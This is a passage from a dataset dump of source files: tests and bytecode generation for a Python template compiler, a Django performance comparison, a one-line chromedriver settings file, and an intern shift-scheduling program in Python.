Literal(\"Foo\"))\n\n self.assertIsInstance(sequence.elements[1],\n IfBlock)\n # TODO There doesn't seem to be an easy way to verify the\n # contents of the AST object.\n self.assertEqual(sequence.elements[1].sequence.elements[0],\n Literal(\"Bar\"))\n\n self.assertEqual(sequence.elements[2],\n Literal(\"Baz\"))\n\n def test_parse_for_loop(self):\n parser = Parser()\n\n sequence = parser.parse([Execution(\"for x in things\"),\n Literal(\"bar\"),\n Execution(\"endfor\")])\n\n expected_sequence = Sequence()\n block = ForBlock(ForNode('x', 'things'))\n block.sequence.add_element(Literal(\"bar\"))\n expected_sequence.add_element(block)\n\n self.assertEqual(sequence.elements,\n expected_sequence.elements)\n\n def test_parse_nested(self):\n parser = Parser()\n\n sequence = parser.parse([Execution(\"for x in things\"),\n Execution(\"if x % 2\"),\n Execution(\"endif\"),\n Execution(\"endfor\")])\n\n self.assertEqual(1,\n len(sequence.elements))\n self.assertIsInstance(sequence.elements[0],\n ForBlock)\n\n self.assertIsInstance(sequence.elements[0].sequence.elements[0],\n IfBlock)\n self.assertEqual(1,\n len(sequence.elements[0].sequence.elements))\n\n def test_expression_parser(self):\n \"\"\"Test the expression parser used within the {% %} node\"\"\"\n\n node = parse_expression([\"if\", \"True\"])\n self.assertIsInstance(node, IfNode)\n self.assertEqual(node.expression.body.value,\n True)\n\n node = parse_expression([\"for\", \"var\", \"in\", \"collection\"])\n self.assertIsInstance(node, ForNode)\n self.assertEqual(node, ForNode(\"var\", \"collection\"))\n\n node = parse_expression([\"if\", \"x\", \"<\", \"y\"])\n self.assertIsInstance(node, IfNode)\n self.assertEqual(ast.dump(node.expression),\n \"Expression(body=Compare(\"\n \"left=Name(id='x', ctx=Load()), ops=[Lt()],\"\n \" comparators=[Name(id='y', ctx=Load())]))\")\n\n node = parse_expression([\"extends\", '\"other.html\"'])\n self.assertIsInstance(node, ExtendsNode)\n self.assertEqual(node.template_name,\n \"other.html\")\n" }, { "alpha_fraction": 0.6567550301551819, "alphanum_fraction": 0.6742081642150879, "avg_line_length": 22.799999237060547, "blob_id": "5c8a346386634c9304a2eb8002344272499b2e90", "content_id": "ee8469aa57f81c7650bcfdcfb77b8a36c94e6dfc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1547, "license_type": "permissive", "max_line_length": 71, "num_lines": 65, "path": "/performance_test.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "\"\"\"Run the same template through Django templates and through\nmargate, to give a crude performance comparison.\n\n\"\"\"\n\nimport timeit\n\nfrom django.template import Context, Engine\n\nfrom margate.compiler import Compiler\n\nexpression = \"\"\"\nHello {{ name }}, I am a {{ whom }}\n\nI'm going to count:\n{% for i in numbers %}\nnext: {{ i }}\n{% endfor %}\n\"\"\"\n\n# Give some variables to print. Note that we have to convert the\n# numbers to string ahead of time, because Django wants to do\n# l10n-specific stuff with numbers and barfs if you attempt to display\n# a number without having settings set up.\nvariables = {\n 'name': 'world',\n 'whom': 'template',\n 'numbers': [str(i) for i in range(200)]\n}\n\ncompiler = Compiler()\nmargate_func = compiler.compile(expression)\n\nengine = Engine()\ntemplate = engine.from_string(expression)\ncontext = Context(variables)\n\n\ndef margate_render():\n return margate_func(**variables)\n\n\ndef django_render():\n return template.render(context)\n\n\ndef do_performance_test():\n assert margate_render() == django_render()\n\n iterations = 1000\n\n time_for_django = timeit.timeit(django_render, number=iterations)\n\n time_for_margate = timeit.timeit(margate_render, number=iterations)\n\n print(\"Django took {time} microseconds\".format(\n time=round(time_for_django / iterations * 1000 * 1000,\n 2)))\n print(\"Margate took {time} microseconds\".format(\n time=round(time_for_margate / iterations * 1000 * 1000,\n 2)))\n\n\nif __name__ == '__main__':\n do_performance_test()\n" }, { "alpha_fraction": 0.5516695380210876, "alphanum_fraction": 0.5520654320716858, "avg_line_length": 28.83070945739746, "blob_id": "72047c080f8cb1f2e08bf8c9610f6d29566ba7a5", "content_id": "1b736dcbcd44540c9cadb9b0ee6c06a64ab51f57", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7577, "license_type": "permissive", "max_line_length": 74, "num_lines": 254, "path": "/margate/code_generation.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "\"\"\"This module contains the building blocks of the final template\nfunction, in the form of bytecode generators.\n\nThere are a series of classes in here that are used as nodes in the\ncode generation tree, and each one implements a ``make_bytecode()``\nmethod.\n\n\"\"\"\n\nfrom bytecode import Instr, Label, ConcreteBytecode\n\n\nclass Sequence:\n \"\"\"A sequence of nodes that occur in a parse tree. Elements in the\n sequence can themselves be sequences (thus forming a tree).\n \"\"\"\n\n def __init__(self):\n self.elements = []\n\n def __eq__(self, other):\n if not isinstance(other, Sequence):\n return False\n\n return self.elements == other.elements\n\n def __repr__(self):\n return \"<Sequence %r>\" % self.elements\n\n def add_element(self, element):\n self.elements.append(element)\n\n\nclass ForBlock:\n def __init__(self, for_node):\n self.variable = for_node.variable\n self.collection = for_node.collection\n self.sequence = Sequence()\n\n def __eq__(self, other):\n if not isinstance(other, ForBlock):\n return False\n\n return (self.variable == other.variable) \\\n and (self.collection == other.collection) \\\n and (self.sequence == other.sequence)\n\n def __repr__(self):\n return \"<ForBlock %r in %r (%r)>\" % (self.variable,\n self.collection,\n self.sequence)\n\n def make_bytecode(self, symbol_table):\n catch_block = Label()\n start_loop = Label()\n end_loop = Label()\n end_for = Label()\n end_of_function = Label()\n\n inner = [Instr(\"SETUP_EXCEPT\", catch_block),\n Instr(\"SETUP_LOOP\", end_for),\n Instr(\"LOAD_NAME\", self.collection),\n Instr(\"GET_ITER\"),\n start_loop,\n Instr(\"FOR_ITER\", end_loop),\n Instr(\"STORE_NAME\", self.variable)]\n\n for element in self.sequence.elements:\n inner += element.make_bytecode(symbol_table)\n\n inner += [Instr(\"JUMP_ABSOLUTE\", start_loop),\n end_loop,\n Instr(\"POP_BLOCK\"),\n end_for,\n Instr(\"POP_BLOCK\"),\n Instr(\"JUMP_FORWARD\", end_of_function)]\n\n inner += [catch_block,\n # In the catch block, we catch everything\n # unconditionally (this is wrong, we should filter\n # out just StopException, which is the only thing we\n # have any business catching here).\n #\n # We pop (I think?) the exception and the stack\n # frame data.\n Instr(\"POP_TOP\"),\n Instr(\"POP_TOP\"),\n Instr(\"POP_TOP\"),\n\n # Pop the exception frame from the block stack.\n Instr(\"POP_EXCEPT\"),\n Instr(\"JUMP_FORWARD\", end_of_function),\n Instr(\"END_FINALLY\"),\n end_of_function]\n\n return inner\n\n\nclass IfBlock:\n \"\"\"The IfBlock generates code for a conditional expression.\n\n This currently only includes literal `True` and `False` as\n expressions, and doesn't support an `else` branch.\n \"\"\"\n\n def __init__(self, condition):\n self.condition = condition\n self.sequence = Sequence()\n\n def __eq__(self, other):\n if not isinstance(other, IfBlock):\n return False\n\n return (self.sequence == other.sequence) \\\n and (self.condition == other.condition)\n\n def __repr__(self):\n return \"<IfBlock %r, %r>\" % (self.condition, self.sequence)\n\n def make_bytecode(self, symbol_table):\n label_end = Label()\n\n compiled_expr = compile(self.condition,\n filename=\"<none>\",\n mode=\"eval\")\n concrete_bytecode = ConcreteBytecode.from_code(compiled_expr)\n inner = concrete_bytecode.to_bytecode()\n\n # The compiler drops a return statement at the end of the\n # expression, which we want to strip off so that we can use\n # the result\n inner.pop()\n\n inner += [Instr(\"POP_JUMP_IF_FALSE\", label_end)]\n\n for element in self.sequence.elements:\n inner += element.make_bytecode(symbol_table)\n\n inner += [label_end]\n\n return inner\n\n\nclass ExtendsBlock:\n def __init__(self, template):\n self.template = template\n self.sequence = Sequence()\n\n def make_bytecode(self, symbol_table):\n inner = []\n\n block_dict = {}\n for entry in self.sequence.elements:\n if isinstance(entry, ReplaceableBlock):\n block_dict[entry.name] = entry.make_bytecode(symbol_table)\n\n for entry in self.template.elements:\n if isinstance(entry, ReplaceableBlock) \\\n and (entry.name in block_dict):\n inner += block_dict[entry.name]\n else:\n inner += entry.make_bytecode(symbol_table)\n\n return inner\n\n\nclass ReplaceableBlock:\n def __init__(self, name):\n self.name = name\n self.sequence = Sequence()\n\n def __eq__(self, other):\n if not isinstance(other, ReplaceableBlock):\n return False\n\n return (self.name == other.name) \\\n and (self.sequence == other.sequence)\n\n def make_bytecode(self, symbol_table):\n inner = []\n\n for entry in self.sequence.elements:\n inner += entry.make_bytecode(symbol_table)\n\n return inner\n\n\nclass VariableExpansion:\n \"\"\"A variable expansion takes the value of an expression and includes\n it in the template output.\n\n \"\"\"\n\n def __init__(self, variable_name):\n self.variable_name = variable_name\n\n def make_bytecode(self, symbol_table):\n code = [Instr(\"LOAD_CONST\", symbol_table[\"write_func\"]),\n Instr(\"LOAD_NAME\", \"_output\"),\n Instr(\"LOAD_NAME\", \"str\")]\n\n compiled_expr = compile(self.variable_name,\n filename=\"<none>\",\n mode=\"eval\")\n concrete_bytecode = ConcreteBytecode.from_code(compiled_expr)\n inner = concrete_bytecode.to_bytecode()\n\n # The compiler drops a return statement at the end of the\n # expression, which we want to strip off so that we can use\n # the result\n inner.pop()\n\n code += inner\n\n code += [Instr(\"CALL_FUNCTION\", 1),\n Instr(\"CALL_FUNCTION\", 2),\n Instr(\"POP_TOP\")]\n\n return code\n\n\nclass Literal:\n def __init__(self, contents):\n self.contents = contents\n\n def __eq__(self, other):\n if not isinstance(other, Literal):\n return False\n\n return other.contents == self.contents\n\n def __repr__(self):\n return \"<Literal %r>\" % self.contents\n\n def make_bytecode(self, symbol_table):\n return [Instr(\"LOAD_CONST\", symbol_table[\"write_func\"]),\n Instr(\"LOAD_NAME\", \"_output\"),\n Instr(\"LOAD_CONST\", self.contents),\n Instr(\"CALL_FUNCTION\", 2),\n Instr(\"POP_TOP\")]\n\n\nclass Execution:\n \"\"\"\n .. todo:: This doesn't really belong in this module. It's here\n because we're combining two different types: block parser\n output and code generation.\n\n \"\"\"\n def __init__(self, expression):\n self.expression = expression\n\n def __repr__(self):\n return \"<Execution: %r>\" % self.expression\n" } ]
17
wangy1b/taobao_seckill
https://github.com/wangy1b/taobao_seckill
b81b961d89197da9a9ba8462a27dcabdc4fad8c6
efc1420230fbab96fb485c47e77d8d49cbbe54e7
6c7558ceed7120af99c1f8dc377ce59dc8b51f4f
refs/heads/master
2023-03-20T23:25:12.039665
2021-03-03T07:41:27
2021-03-03T07:41:27
344,042,601
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6590909361839294, "alphanum_fraction": 0.7045454382896423, "avg_line_length": 16.799999237060547, "blob_id": "fb387f9e2cd84b3bc6f423383627003560677670", "content_id": "80aaff234ada5b657414ef707e19adbffc8e7210", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 46, "num_lines": 5, "path": "/seckill/settings.py", "repo_name": "wangy1b/taobao_seckill", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# encoding=utf-8\n\n\nDRIVER_DIR = \"C:\\\\Program\\\\chromedriver_win32\"" } ]
1
raphaellieber/schedule
https://github.com/raphaellieber/schedule
0ddc5ca8015f3f37f2a9c989c9e46642fca6b34a
57d291b391bff5c9d8dfce4aba6f94e09aca930b
32aba729aa0fdc7c79d948b9e80403f6cbc2e70c
refs/heads/main
2022-12-31T06:02:50.705058
2020-10-02T12:27:44
2020-10-02T12:27:44
300,601,184
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6375445127487183, "alphanum_fraction": 0.6409252882003784, "avg_line_length": 38.446044921875, "blob_id": "057079aeef6e7d0039818d81b55944cb4eb60774", "content_id": "8910bdb3ffb362ec1e4d53ddb7e956a9d957670d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5620, "license_type": "no_license", "max_line_length": 106, "num_lines": 139, "path": "/days.py", "repo_name": "raphaellieber/schedule", "src_encoding": "UTF-8", "text": "class Dates:\r\n def __init__(self, day, month, year, weekday, day_type, nr_positions, min_proficient, max_proficient):\r\n self.__day = day\r\n self.__month = month\r\n self.__year = year\r\n self.__weekday = weekday\r\n self.__day_type = day_type\r\n self.__nr_required_interns = nr_positions\r\n self.__nr_required_proficient_interns = min_proficient\r\n self.__nr_required_non_proficient_interns = nr_positions - max_proficient\r\n self.__nr_available_interns = 0\r\n self.__nr_available_proficient_interns = 0\r\n self.__nr_available_non_proficient_interns = 0\r\n self.__available_proficient_interns = []\r\n self.__available_non_proficient_interns = []\r\n self.__unavailable_proficient_interns = []\r\n self.__unavailable_non_proficient_interns = []\r\n self.__allocated_proficient_interns = []\r\n self.__allocated_non_proficient_interns = []\r\n self.__changes_to_other_dates = {}\r\n\r\n\r\n ################################# Get methods #################################\r\n def get_day(self):\r\n return self.__day\r\n\r\n def get_weekday(self):\r\n return self.__weekday\r\n\r\n def get_day_type(self):\r\n return self.__day_type\r\n\r\n def get_nr_required_interns(self):\r\n return self.__nr_required_interns\r\n\r\n def get_nr_required_proficient_interns(self):\r\n return self.__nr_required_proficient_interns\r\n\r\n def get_nr_required_non_proficient_interns(self):\r\n return self.__nr_required_non_proficient_interns\r\n\r\n def get_nr_available_interns(self):\r\n return self.__nr_available_interns\r\n\r\n def get_nr_available_proficient_interns(self):\r\n return self.__nr_available_proficient_interns\r\n\r\n def get_nr_available_non_proficient_interns(self):\r\n return self.__nr_available_non_proficient_interns\r\n\r\n def get_available_proficient_interns(self):\r\n return self.__available_proficient_interns\r\n\r\n def get_available_non_proficient_interns(self):\r\n return self.__available_non_proficient_interns\r\n\r\n def get_available_interns(self):\r\n return self.get_available_proficient_interns() + self.get_available_non_proficient_interns()\r\n\r\n def get_allocated_proficient_interns(self):\r\n return self.__allocated_proficient_interns\r\n\r\n def get_allocated_non_proficient_interns(self):\r\n return self.__allocated_non_proficient_interns\r\n\r\n def get_changes_to_other_dates(self):\r\n return self.__changes_to_other_dates\r\n\r\n def get_allocated_interns(self):\r\n return self.get_allocated_proficient_interns() + self.get_allocated_non_proficient_interns()\r\n\r\n def get_nr_allocated_interns(self):\r\n return len(self.get_allocated_interns())\r\n\r\n ################################# Change methods #################################\r\n def add_available_proficient_intern(self, intern):\r\n self.__available_proficient_interns.append(intern)\r\n self.__nr_available_interns += 1\r\n self.__nr_available_proficient_interns += 1\r\n\r\n def add_available_non_proficient_intern(self, intern):\r\n self.__available_non_proficient_interns.append(intern)\r\n self.__nr_available_interns += 1\r\n self.__nr_available_non_proficient_interns += 1\r\n\r\n def remove_available_proficient_intern(self, intern):\r\n self.__available_proficient_interns.remove(intern)\r\n self.__nr_available_interns -= 1\r\n self.__nr_available_proficient_interns -= 1\r\n\r\n def remove_available_non_proficient_intern(self, intern):\r\n self.__available_non_proficient_interns.remove(intern)\r\n self.__nr_available_interns -= 1\r\n self.__nr_available_non_proficient_interns -= 1\r\n\r\n def make_unavailable_proficient_intern(self, intern):\r\n self.remove_available_proficient_intern(intern)\r\n self.__unavailable_proficient_interns.append(intern)\r\n\r\n def make_unavailable_non_proficient_intern(self, intern):\r\n self.remove_available_non_proficient_intern(intern)\r\n self.__unavailable_non_proficient_interns.append(intern)\r\n\r\n def make_available_proficient_intern(self, intern):\r\n self.add_available_proficient_intern(intern)\r\n self.__unavailable_proficient_interns.remove(intern)\r\n\r\n def make_available_non_proficient_intern(self, intern):\r\n self.add_available_non_proficient_intern(intern)\r\n self.__unavailable_non_proficient_interns.remove(intern)\r\n\r\n def allocate_proficient_intern(self, intern):\r\n self.__allocated_proficient_interns.append(intern)\r\n self.__nr_required_interns -= 1\r\n self.__nr_required_proficient_interns -= 1\r\n\r\n def allocate_non_proficient_intern(self, intern):\r\n self.__allocated_non_proficient_interns.append(intern)\r\n self.__nr_required_interns -= 1\r\n self.__nr_required_non_proficient_interns -= 1\r\n\r\n def remove_allocation_proficient_intern(self, intern):\r\n self.__allocated_proficient_interns.remove(intern)\r\n self.__nr_required_interns += 1\r\n self.__nr_required_proficient_interns += 1\r\n\r\n def remove_allocation_non_proficient_intern(self, intern):\r\n self.__allocated_non_proficient_interns.remove(intern)\r\n self.__nr_required_interns += 1\r\n self.__nr_required_non_proficient_interns += 1\r\n\r\n def record_changes(self, intern, days_list):\r\n self.__changes_to_other_dates.update({intern: days_list})\r\n\r\n def remove_changes(self, intern):\r\n del self.__changes_to_other_dates[intern]\r\n\r\n def is_weekend(self):\r\n return self.__day_type == 'Weekend'" }, { "alpha_fraction": 0.6317156553268433, "alphanum_fraction": 0.6382099390029907, "avg_line_length": 48.118343353271484, "blob_id": "002316460b53fc11b640c5f5a48aa24674e6da49", "content_id": "e7a8570c4c92b096c2b79ccc15658ed85b6a0207", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16938, "license_type": "no_license", "max_line_length": 128, "num_lines": 338, "path": "/interns_schedule.py", "repo_name": "raphaellieber/schedule", "src_encoding": "UTF-8", "text": "import pandas as pd\r\nfrom interns import *\r\nfrom days import *\r\nfrom tkinter import *\r\n\r\n################################### Constants ###################################\r\nNR_INTERNS_PER_DAY = 5\r\nNR_PROFICIENT_PER_DAY = [2, 3]\r\nNR_OF_WEEKEND_DAYS = [0, 5]\r\n\r\n\r\n################################### Initiation ###################################\r\ndef pos_dates(req_list, days_list):\r\n return [days_list[i] for i in range(len(req_list)) if req_list[i] != 'no']\r\n\r\n\r\ndef req_dates(req_list, days_list):\r\n return [days_list[i] for i in range(len(req_list)) if req_list[i] == 'required']\r\n\r\n\r\ndef mand_dates(req_list, days_list):\r\n return [days_list[i] for i in range(len(req_list)) if req_list[i] == 'mandatory']\r\n\r\n\r\ndef allocate_mandatory(list_of_interns):\r\n for intern in list_of_interns:\r\n for date in intern.get_mandatory_dates():\r\n if intern.get_proficiency():\r\n allocate_proficient_intern(date, intern)\r\n else:\r\n allocate_non_proficient_intern(date, intern)\r\n\r\n\r\ndef create_intern_list_for_each_day(list_of_interns):\r\n for intern in list_of_interns:\r\n if intern.get_proficiency():\r\n for date in intern.get_possible_dates():\r\n date.add_available_proficient_intern(intern)\r\n else:\r\n for date in intern.get_possible_dates():\r\n date.add_available_non_proficient_intern(intern)\r\n\r\n\r\n################################### Legality ###################################\r\ndef more_than_enough_proficient_interns(day, proficient_intern_index, non_proficient_intern_index):\r\n remaining_proficient_interns = day.get_nr_available_proficient_interns() - proficient_intern_index\r\n remaining_non_proficient_interns = day.get_nr_available_non_proficient_interns() - non_proficient_intern_index\r\n return remaining_proficient_interns > day.get_nr_required_proficient_interns() and \\\r\n remaining_proficient_interns + remaining_non_proficient_interns > day.get_nr_required_interns()\r\n\r\n\r\ndef more_than_enough_non_proficient_interns(day, proficient_intern_index, non_proficient_intern_index):\r\n remaining_proficient_interns = day.get_nr_available_proficient_interns() - proficient_intern_index\r\n remaining_non_proficient_interns = day.get_nr_available_non_proficient_interns() - non_proficient_intern_index\r\n return remaining_non_proficient_interns > day.get_nr_required_non_proficient_interns() and \\\r\n remaining_proficient_interns + remaining_non_proficient_interns > day.get_nr_required_interns()\r\n\r\n\r\ndef last_intern_in_group(intern_index, group_size):\r\n return intern_index == group_size - 1\r\n\r\ndef legal_to_adapt_future_days(future_potential_dates, days_to_adapt, intern):\r\n \"\"\"\r\n consider adding verification if there will remain enough available days for the intern.\r\n \"\"\"\r\n nr_to_allocate = intern.get_nr_asked() - intern.get_nr_allocated()\r\n nr_available_currently = len(future_potential_dates) + 1\r\n if nr_to_allocate > nr_available_currently:\r\n return False\r\n\r\n if intern.get_proficiency():\r\n for day in days_to_adapt:\r\n if not more_than_enough_proficient_interns(day, 0, 0):\r\n return False\r\n else:\r\n for day in days_to_adapt:\r\n if not more_than_enough_non_proficient_interns(day, 0, 0):\r\n return False\r\n return True\r\n\r\ndef weekends_allocation_legal(intern, remaining_days):\r\n if not intern.weekend_allocation_required():\r\n return True\r\n else:\r\n remaining_weekend_days = [day.get_day() for day in remaining_days if day.is_weekend()]\r\n nr_relevant_remaining_weekend_days = len(remaining_weekend_days) - amount_of_proximal_days(remaining_weekend_days)\r\n return intern.get_nr_required_weekend_days() <= nr_relevant_remaining_weekend_days\r\n\r\ndef amount_of_proximal_days(days_list):\r\n if len(days_list) <= 1:\r\n return 0\r\n if days_list[1] - days_list[0] == 1:\r\n return 1 + amount_of_proximal_days(days_list[1:])\r\n else:\r\n return 0 + amount_of_proximal_days(days_list[1:])\r\n\r\n################################### Scheduling - Regular functions ###################################\r\ndef allocate_proficient_intern(date, intern):\r\n intern.allocate(date)\r\n if date.is_weekend():\r\n intern.weekend_allocated()\r\n date.allocate_proficient_intern(intern)\r\n\r\n\r\ndef allocate_non_proficient_intern(date, intern):\r\n intern.allocate(date)\r\n if date.is_weekend():\r\n intern.weekend_allocated()\r\n date.allocate_non_proficient_intern(intern)\r\n\r\n\r\ndef remove_allocation(intern, date):\r\n intern.remove_last_allocation()\r\n if date.is_weekend():\r\n intern.removed_weekend_allocation()\r\n if intern.get_proficiency():\r\n date.remove_allocation_proficient_intern(intern)\r\n else:\r\n date.remove_allocation_non_proficient_intern(intern)\r\n\r\n\r\ndef adapt_more_than_1(days_list, day_index, intern, relevant_days_index_list):\r\n if intern.get_nr_asked() == intern.get_nr_allocated():\r\n relevant_days_index_list.extend([index for index in range(day_index + 2, len(days_list))])\r\n return [days_list[new_index] for new_index in relevant_days_index_list if\r\n intern in days_list[new_index].get_available_interns()]\r\n\r\n\r\ndef adapt_more_than_2(days_list, day_index, intern, relevant_days_index_list):\r\n if intern.get_nr_asked() == intern.get_nr_allocated():\r\n relevant_days_index_list.extend([index for index in range(day_index + 2, len(days_list))])\r\n else:\r\n relevant_days_index_list.append(day_index + 2)\r\n return [days_list[new_index] for new_index in relevant_days_index_list if\r\n intern in days_list[new_index].get_available_interns()]\r\n\r\n\r\ndef adapt_more_than_3(days_list, day_index, intern, relevant_days_index_list):\r\n if intern.get_nr_asked() == intern.get_nr_allocated():\r\n relevant_days_index_list.extend([index for index in range(day_index + 2, len(days_list))])\r\n else:\r\n relevant_days_index_list.extend([day_index + 2, day_index + 3])\r\n return [days_list[new_index] for new_index in relevant_days_index_list if\r\n intern in days_list[new_index].get_available_interns()]\r\n\r\n\r\ndef adapt_more_than_7(days_list, day_index, intern, relevant_days_index_list):\r\n if intern.get_nr_asked() == intern.get_nr_allocated():\r\n relevant_days_index_list.extend([index for index in range(day_index + 2, len(days_list))])\r\n else:\r\n relevant_days_index_list.extend([day_index + 2, day_index + 3])\r\n if days_list[day_index].get_weekday() in ['Wed', 'Thu']:\r\n relevant_days_index_list.extend([index for index in range(day_index + 7, len(days_list), 7)])\r\n elif days_list[day_index].is_weekend() and not intern.weekend_allocation_permitted():\r\n relevant_days_index_list.extend([index for index in range(day_index + 7, len(days_list), 7)])\r\n if days_list[day_index].get_weekday() == 'Sat':\r\n relevant_days_index_list.extend([index - 1 for index in range(day_index + 7, len(days_list), 7)])\r\n return [days_list[new_index] for new_index in relevant_days_index_list if\r\n intern in days_list[new_index].get_available_interns()]\r\n\r\n\r\ndef adapt_more_than_8(days_list, day_index, intern, relevant_days_index_list):\r\n if intern.get_nr_asked() == intern.get_nr_allocated():\r\n relevant_days_index_list.extend([index for index in range(day_index + 2, len(days_list))])\r\n else:\r\n relevant_days_index_list.extend([day_index + 2, day_index + 3])\r\n if days_list[day_index].get_weekday() in ['Wed', 'Thu']:\r\n relevant_days_index_list.extend([index for index in range(day_index + 7, len(days_list), 7)])\r\n elif days_list[day_index].is_weekend() and not intern.weekend_allocation_permitted():\r\n relevant_days_index_list.extend([index for index in range(day_index + 7, len(days_list), 7)])\r\n if days_list[day_index].get_weekday() == 'Fri':\r\n relevant_days_index_list.extend([index + 1 for index in range(day_index + 7, len(days_list), 7)])\r\n elif days_list[day_index].get_weekday() == 'Sat':\r\n relevant_days_index_list.extend([index - 1 for index in range(day_index + 7, len(days_list), 7)])\r\n return [days_list[new_index] for new_index in relevant_days_index_list if\r\n intern in days_list[new_index].get_available_interns()]\r\n\r\n\r\ndef future_days_to_adapt(days_list, day_index, intern):\r\n relevant_days_index_list = [day_index + 1]\r\n remaining_days = len(days_list) - day_index\r\n # if remaining_days > 8:\r\n # return adapt_more_than_8(days_list, day_index, intern, relevant_days_index_list)\r\n # elif remaining_days > 7:\r\n # return adapt_more_than_7(days_list, day_index, intern, relevant_days_index_list)\r\n if remaining_days > 3:\r\n return adapt_more_than_3(days_list, day_index, intern, relevant_days_index_list)\r\n elif remaining_days > 2:\r\n return adapt_more_than_2(days_list, day_index, intern, relevant_days_index_list)\r\n elif remaining_days > 1:\r\n return adapt_more_than_1(days_list, day_index, intern, relevant_days_index_list)\r\n return []\r\n\r\n\r\ndef adapt_future_days(current_day, future_days_list, intern):\r\n if intern.get_proficiency():\r\n for day in future_days_list:\r\n day.make_unavailable_proficient_intern(intern)\r\n else:\r\n for day in future_days_list:\r\n day.make_unavailable_non_proficient_intern(intern)\r\n current_day.record_changes(intern, future_days_list)\r\n\r\n\r\ndef undo_future_adaptations(current_day, intern):\r\n days_list = current_day.get_changes_to_other_dates()[intern]\r\n if intern.get_proficiency():\r\n for day in days_list:\r\n day.make_available_proficient_intern(intern)\r\n else:\r\n for day in days_list:\r\n day.make_available_non_proficient_intern(intern)\r\n current_day.remove_changes(intern)\r\n\r\n\r\n\r\n\r\n\r\n\r\n################################### Scheduling - Recursive functions ###################################\r\ndef schedule(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index, solutions):\r\n if len(solutions) == 1:\r\n return\r\n\r\n if day_index == len(list_of_days):\r\n solutions.append(create_df_sched(list_of_days))\r\n return\r\n\r\n if list_of_days[day_index].get_nr_required_interns() == 0:\r\n schedule(list_of_days, day_index + 1, 0, 0, solutions)\r\n\r\n else:\r\n if list_of_days[day_index].get_nr_required_proficient_interns() > 0:\r\n schedule_proficient(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index, solutions)\r\n\r\n elif list_of_days[day_index].get_nr_required_non_proficient_interns() > 0:\r\n schedule_non_proficient(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index, solutions)\r\n\r\n else:\r\n if list_of_days[day_index].get_nr_available_proficient_interns() - proficient_intern_index > 0:\r\n schedule_proficient(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index,\r\n solutions)\r\n if list_of_days[day_index].get_nr_available_non_proficient_interns() - non_proficient_intern_index > 0:\r\n schedule_non_proficient(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index,\r\n solutions)\r\n return\r\n\r\n\r\ndef schedule_proficient(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index, solutions):\r\n current_day = list_of_days[day_index]\r\n intern = current_day.get_available_proficient_interns()[proficient_intern_index]\r\n future_potential_days = [list_of_days[index] for index in range(day_index, len(list_of_days)) if\r\n intern in list_of_days[index].get_available_proficient_interns()]\r\n affected_days = future_days_to_adapt(list_of_days, day_index, intern)\r\n # if legal_to_adapt_future_days(affected_days, intern) and weekends_allocation_legal(intern, [current_day] + affected_days):\r\n if legal_to_adapt_future_days(future_potential_days, affected_days, intern):\r\n allocate_proficient_intern(current_day, intern)\r\n adapt_future_days(current_day, affected_days, intern)\r\n schedule(list_of_days, day_index, proficient_intern_index + 1, non_proficient_intern_index, solutions)\r\n undo_future_adaptations(current_day, intern)\r\n remove_allocation(intern, current_day)\r\n if more_than_enough_proficient_interns(current_day, proficient_intern_index, non_proficient_intern_index) and not \\\r\n last_intern_in_group(proficient_intern_index, current_day.get_nr_available_proficient_interns()):\r\n schedule_proficient(list_of_days, day_index, proficient_intern_index + 1, non_proficient_intern_index, solutions)\r\n return\r\n\r\n\r\ndef schedule_non_proficient(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index, solutions):\r\n current_day = list_of_days[day_index]\r\n intern = current_day.get_available_non_proficient_interns()[non_proficient_intern_index]\r\n future_potential_days = [list_of_days[index] for index in range(day_index, len(list_of_days)) if\r\n intern in list_of_days[index].get_available_non_proficient_interns()]\r\n affected_days = future_days_to_adapt(list_of_days, day_index, intern)\r\n # if legal_to_adapt_future_days(affected_days, intern) and weekends_allocation_legal(intern, [current_day] + affected_days):\r\n if legal_to_adapt_future_days(future_potential_days, affected_days, intern):\r\n allocate_non_proficient_intern(current_day, intern)\r\n adapt_future_days(current_day, affected_days, intern)\r\n schedule(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index + 1, solutions)\r\n undo_future_adaptations(current_day, intern)\r\n remove_allocation(intern, current_day)\r\n if more_than_enough_non_proficient_interns(current_day, proficient_intern_index, non_proficient_intern_index) and \\\r\n not last_intern_in_group(non_proficient_intern_index, current_day.get_nr_available_non_proficient_interns()):\r\n schedule_non_proficient(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index + 1, solutions)\r\n return\r\n\r\n\r\n################################### Export ###################################\r\ndef create_df_sched(list_of_days):\r\n dates = [date.get_day() for date in list_of_days]\r\n positions = [(i + 1) for i in range(list_of_days[0].get_nr_allocated_interns())]\r\n return pd.DataFrame([[intern.get_name() for intern in day.get_allocated_interns()] for day in list_of_days], index=dates,\r\n columns=positions)\r\n\r\n\r\n################################### Main ###################################\r\ndf_cal = pd.read_csv(\"dates.csv\")\r\ndf_req = pd.read_csv(\"requests.csv\")\r\n\r\nlist_of_days = [Dates(row['Day'], row['Month'], row['Year'], row['Weekday'],\r\n row['Type'], NR_INTERNS_PER_DAY, NR_PROFICIENT_PER_DAY[0], NR_PROFICIENT_PER_DAY[1])\r\n for index, row in df_cal.iterrows()]\r\nlist_of_interns = [Interns(row['name'], row['proficiency'], row['amount'], pos_dates(row[3:], list_of_days),\r\n req_dates(row[3:], list_of_days), mand_dates(row[3:], list_of_days), NR_OF_WEEKEND_DAYS)\r\n for index, row in 